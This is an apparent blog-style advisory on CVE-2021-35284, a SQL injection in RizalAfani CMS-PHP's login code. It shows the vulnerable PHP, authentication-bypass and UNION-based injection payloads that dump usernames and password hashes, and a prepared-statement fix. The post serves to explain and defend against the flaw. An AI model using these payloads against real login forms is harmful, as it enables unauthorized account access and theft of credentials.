CVE-2021-35284 is a critical SQL Injection vulnerability discovered in the get_user function in the login_manager.php file of RizalAfani CMS-PHP v1. This vulnerability can be exploited by attackers to compromise the entire web application and gain access to sensitive information. In this post, we'll dive deep into this vulnerability, understanding how it works, and discussing possible exploitation methods.
Vulnerable Code
The issue lies within the get_user function found in login_manager.php. The function is meant to retrieve user details upon successful login. Here is the relevant code snippet:
function get_user($username, $password) {
global $db;
$query = "SELECT * FROM user WHERE username = '$username' AND password = '$password'";
$result = $db->query($query);
return $result->fetch_assoc();
}
The vulnerability arises from the concatenation of user-supplied input and SQL queries without proper input validation or sanitation. This means that an attacker can execute arbitrary SQL commands by manually crafting the input parameters $username and $password.
Exploit Details
To exploit this vulnerability, an attacker would need to manipulate the $username and $password parameters to bypass authentication and execute arbitrary SQL commands. The following example demonstrates how an attacker might craft the input parameters to bypass the authentication mechanism and log in as the first user in the user table:
$username = "admin' -- ";
$password = "anything";
By inserting these values into the vulnerable get_user function, the resulting SQL query would be
SELECT * FROM user WHERE username = 'admin' -- ' AND password = 'anything'
The double hyphen (--) in the $username parameter acts as a comment in SQL, effectively ignoring the rest of the query. This essentially nullifies the check on $password, allowing the attacker to log in as the first user in the table without knowing their actual password.
It is also possible to use this vulnerability to extract sensitive information from the database, such as usernames and password hashes. An attacker can use UNION-based queries to achieve this. Here's an example:
$username = "admin' UNION SELECT 1,username,3,password FROM user -- ";
$password = "anything";
This crafted input will result in the following SQL query
SELECT * FROM user WHERE username = 'admin' UNION SELECT 1,username,3,password FROM user -- ' AND password = 'anything'
This UNION-based query will essentially return the usernames and password hashes of all users in the application, potentially allowing the attacker to gain unauthorized access to all user accounts.
Original References
1. NVD - CVE-2021-35284
2. Github: RizalAfani CMS-PHP v1
Mitigation
To mitigate this vulnerability, it is essential to implement proper input validation and sanitize user-provided data before using it in SQL queries. One way to achieve this is by using prepared statements with parameter binding, which ensures the safe handling of user-supplied input. Here's an example of how the get_user function could be rewritten using prepared statements:
function get_user($username, $password) {
global $db;
$query = "SELECT * FROM user WHERE username = ? AND password = ?";
$stmt = $db->prepare($query);
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$result = $stmt->get_result();
return $result->fetch_assoc();
}
In summary, CVE-2021-35284 is a critical SQL Injection vulnerability in RizalAfani CMS-PHP v1 that allows attackers to compromise the web application and gain access to sensitive information. To protect against this vulnerability, developers should employ proper input validation and sanitation techniques, such as using prepared statements with parameter binding.
Timeline
Published on: 11/23/2022 18:15:00 UTC
Last modified on: 11/28/2022 18:29:00 UTC